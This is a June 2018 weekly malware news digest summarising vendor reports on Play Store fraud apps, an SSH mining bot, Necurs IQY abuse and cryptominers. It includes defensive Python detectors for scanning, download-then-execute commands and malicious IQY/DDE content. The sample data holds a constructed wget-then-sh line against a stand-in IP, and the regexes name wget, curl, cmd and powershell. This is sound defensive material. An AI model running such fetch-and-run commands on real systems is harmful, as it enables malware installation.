Malware Watch - W/E - 062918

Malicious Google Play Apps Connected to AsiaHitGroup Gang (06/28/2018)
McAfee uncovered 15 apps on Google Play that were uploaded by the AsiaHitGroup Gang. All of the apps, including one that claimed to be the Despacito ringtone app and had been downloaded 50,000 times, steal money from unsuspecting victims. In this campaign, the AsiaHitGroup Gang targeted users in Kazakhstan, Malaysia, and Russia.

Mining Bot Takes Aim at Devices Running Secure Shell (06/27/2018)
Trend Micro's honeypot sensors picked up a mining bot associated with the IP address 192.158.228.46. The address has been observed scanning for both Secure Shell (SSH)- and Internet of Things-related ports, including 22, 2222, and 502. One particular attack hit port 22, the SSH service. The bot searches for devices that have an open Remote Desktop Protocol port, which lets the attacker take advantage of vulnerable devices. Once the attacker identifies a device to infect, it attempts to run a wget command that downloads a script into a directory and then runs that script to install the malware.
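The two observable behaviours in this item are a single source probing several SSH/IoT ports and a one-line download-then-execute command. The following added example (not Trend Micro's code) shows how a defender could flag both from logs: the flow log lines, the key=value log format, the process command lines and the hosts 203.0.113.9 and 198.51.100.7 are all constructed for the example; only the source address 192.158.228.46 and the ports 22, 2222 and 502 come from the digest.

```python
import re
from collections import defaultdict

# Constructed honeypot flow log lines in a hypothetical key=value format.
# Only the scanning source address and the three ports come from the digest.
SAMPLE_FLOW_LOG = """\
2018-06-27T09:14:02Z src=192.158.228.46 dport=22 proto=tcp
2018-06-27T09:14:05Z src=192.158.228.46 dport=2222 proto=tcp
2018-06-27T09:14:09Z src=192.158.228.46 dport=502 proto=tcp
2018-06-27T09:15:11Z src=198.51.100.7 dport=22 proto=tcp
"""

# Ports the digest says the bot probes: SSH (22), alternate SSH (2222) and 502.
WATCHED_PORTS = {22, 2222, 502}

FLOW_RE = re.compile(r"src=(?P<src>[\d.]+)\s+dport=(?P<dport>\d+)")


def find_multiport_scanners(log_text, watched=WATCHED_PORTS, min_hits=2):
    """Return {src: sorted watched ports} for sources touching >= min_hits watched ports.

    A single hit on port 22 is ordinary noise; one source walking several of the
    watched ports in quick succession is the pattern worth alerting on.
    """
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = FLOW_RE.search(line)
        if not m:
            continue  # skip lines that are not flow records
        seen[m["src"]].add(int(m["dport"]))
    return {
        src: sorted(p for p in ports if p in watched)
        for src, ports in seen.items()
        if len(ports & watched) >= min_hits
    }


# Constructed process-audit command lines (e.g. from an auditd or EDR feed).
SAMPLE_CMDLINES = [
    "wget http://203.0.113.9/x.sh -O /tmp/x.sh && sh /tmp/x.sh",
    "wget https://mirror.example.internal/pkg.tar.gz -O /opt/pkg.tar.gz",
    "ls -la /tmp",
]

# A downloader (wget/curl) chained straight into an interpreter or chmod +x on
# the same command line is the "download a script, then run it" step from the item.
DOWNLOAD_EXEC_RE = re.compile(
    r"\b(wget|curl)\b.*?(&&|;|\|)\s*(sh|bash|chmod\s+\+?x)\b", re.IGNORECASE
)


def is_download_then_execute(cmdline):
    """True when one command line both downloads a file and immediately executes it."""
    return bool(DOWNLOAD_EXEC_RE.search(cmdline))


def flag_cmdlines(cmdlines):
    """Return only the command lines that match the download-then-execute pattern."""
    return [c for c in cmdlines if is_download_then_execute(c)]


if __name__ == "__main__":
    print(find_multiport_scanners(SAMPLE_FLOW_LOG))
    print(flag_cmdlines(SAMPLE_CMDLINES))
```

The port check is deliberately tolerant of a single hit: a lone connection to port 22 is background noise on any Internet-facing host, while one address touching two or more of the watched ports inside a short window is the scanning behaviour the digest describes. The command-line check keys on the chaining operator between the downloader and the interpreter, which is what separates an ordinary package fetch from a fetch-and-run.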

Necurs Gets Stealthier with Abuse of Internet Query File (06/27/2018)
The operators of the Necurs botnet have updated the malware to use the Internet query file format (IQY) to slip past detection. IQY files are meant to let users import data from external sources into an Excel spreadsheet. By default, Windows recognizes IQY files as Excel Web Query Files and automatically opens them in Excel. Once the user opens the IQY file, Excel sends a query to the URL indicated in the file, and the Web query pulls data from that URL into an Excel worksheet. The pulled data contains a script that abuses Excel's Dynamic Data Exchange feature, enabling it to execute a command line that starts a PowerShell process. This process allows the fileless execution of a remote PowerShell script, which then downloads a Trojanized remote access application and its final payload, the backdoor FlawedAMMYY. This information comes from Trend Micro. In a second post, Trend Micro addresses other changes that have been made to Necurs.
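Because an IQY file is plain text with a fixed layout (connection type, version line, URL, optional parameters), it is cheap to inspect at a mail gateway or on an endpoint before Excel ever opens it. The following added example (not Trend Micro's code and not a sample from the Necurs campaign) parses an IQY file, flags external, cleartext or bare-IP fetch targets against a hypothetical allowlist, and separately checks fetched content for the DDE command-launch shape the item describes. The file contents, the host 203.0.113.10, the allowlisted host reports.example.internal and the fetched-data sample are all constructed.

```python
import re
from urllib.parse import urlparse

# Constructed .iqy contents for the example. An Excel Web Query file is plain text:
# the connection type ("WEB"), a version line, the URL to fetch, then optional
# parameter lines.
SUSPICIOUS_IQY = "WEB\n1\nhttp://203.0.113.10/update/data.dat\n"
BENIGN_IQY = "WEB\n1\nhttps://reports.example.internal/sales.html\n"

# Hypothetical allowlist of hosts the organisation legitimately pulls Excel data from.
TRUSTED_HOSTS = {"reports.example.internal"}


def parse_iqy(text):
    """Return the parts of a WEB-type .iqy file, or None if the text is not one."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return None
    return {"type": "WEB", "version": lines[1], "url": lines[2], "params": lines[3:]}


def assess_iqy(text, trusted=TRUSTED_HOSTS):
    """Classify an .iqy file as 'allowed', 'suspicious' or 'not-a-web-query', with reasons."""
    parsed = parse_iqy(text)
    if parsed is None:
        return {"verdict": "not-a-web-query", "reasons": [], "url": None}
    reasons = []
    url = urlparse(parsed["url"])
    host = url.hostname or ""
    if url.scheme not in ("http", "https"):
        reasons.append(f"unexpected scheme '{url.scheme}'")
    elif url.scheme == "http":
        reasons.append("cleartext http fetch")
    if host not in trusted:
        reasons.append(f"host '{host}' not on allowlist")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
        reasons.append("bare IP address instead of hostname")
    verdict = "suspicious" if reasons else "allowed"
    return {"verdict": verdict, "reasons": reasons, "url": parsed["url"]}


# The digest says the data pulled by the query abuses Excel's DDE feature to start a
# command line. A DDE launch formula has the '=program|command!' shape; this check
# looks for that shape with a shell-capable program name in fetched content.
DDE_LAUNCH_RE = re.compile(r"=\s*(cmd|msexcel|excel|powershell)\s*\|", re.IGNORECASE)


def contains_dde_launch(fetched_text):
    """True when content fetched by a web query carries a DDE command-launch formula."""
    return bool(DDE_LAUNCH_RE.search(fetched_text))


# Constructed fetched content: a harmless echo, not the campaign's real second stage.
SAMPLE_FETCHED_DATA = "=cmd|' /c echo constructed'!A0"


if __name__ == "__main__":
    for name, content in (("suspicious", SUSPICIOUS_IQY), ("benign", BENIGN_IQY)):
        print(name, assess_iqy(content))
    print("dde launch in fetched data:", contains_dde_launch(SAMPLE_FETCHED_DATA))
```

The two checks sit at different points in the chain: the IQY inspection runs on the attachment itself, where blocking is cheapest, while the DDE check applies to whatever the query actually returns, which is where the item says the malicious script lives. An organisation that never uses web queries can simply quarantine every IQY attachment; the allowlist form above is for environments that still depend on them.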

PBot Evolves from Adware to Include Mining Feature (06/27/2018)
Several modifications of the PBot (PythonBot) adware have appeared since the malware was first detected, and Kaspersky Lab warned that it now employs a hidden cryptocurrency miner. In April, there were more than 50,000 instances of PBot attempting to install itself on computers running Kaspersky products. PBot mainly targets users in Russia, Ukraine, and Kazakhstan, and it uses various techniques to stay obfuscated.

Proofpoint Assesses the Rise of Cryptocurrency Mining Malware (06/27/2018)
Proofpoint analyzed the trends surrounding cryptocurrency mining and the current state of this malware in a blog post. According to the research, Locky brought ransomware to massive scale in 2016, which helped pave the way for new ransomware strains and, in turn, for the introduction of cryptocurrency mining malware. One takeaway from the data is that typical banking Trojans, most notably The Trick, have added cryptocurrency mining features to their primary payload.

Report Finds Sobering Growth in Malicious Cryptocurrency Mining (06/27/2018)
Kaspersky Lab has found that the number of Internet users attacked by malicious cryptocurrency mining software has increased from 1.9 million to 2.7 million in just one year. Mobile cryptocurrency miner attacks grew by 9.5% and targeted 5,000 users between 2017-2018, as compared to 4,500 users between 2016-2017. These details come from a new ransomware and malicious crypto miners report from Kaspersky Lab.